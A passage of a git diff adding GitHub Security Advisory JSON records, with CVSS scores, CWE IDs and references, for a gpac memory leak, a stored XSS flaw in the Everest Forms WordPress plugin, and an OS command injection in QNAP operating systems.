"GHSA-xwmx-qhv2-jx64", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24267" + ], + "details": "gpac v2.2.1 was discovered to contain a memory leak via the gfio_blob variable in the gf_fileio_from_blob function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24267" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_3.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json b/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json new file mode 100644 index 0000000000000..78868d2bbe827 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xww7-5f37-vrcg/GHSA-xww7-5f37-vrcg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xww7-5f37-vrcg", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51695" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPEverest Everest Forms – Build Contact Forms, Surveys, Polls, Application Forms, and more with Ease! allows Stored XSS.This issue affects Everest Forms – Build Contact Forms, Surveys, Polls, Application Forms, and more with Ease!: from n/a through 2.0.4.1.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51695" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/everest-forms/wordpress-everest-forms-plugin-2-0-4-1-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json b/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json new file mode 100644 index 0000000000000..7f25dc83b985f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-xxpm-69vv-79hr/GHSA-xxpm-69vv-79hr.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxpm-69vv-79hr", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41282" + ], + "details": "An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.4.2596 build 20231128 and later\nQuTS hero h5.1.4.2596 build 20231128 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41282" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-53" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77", + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:49Z" + } +} \ No newline at end of file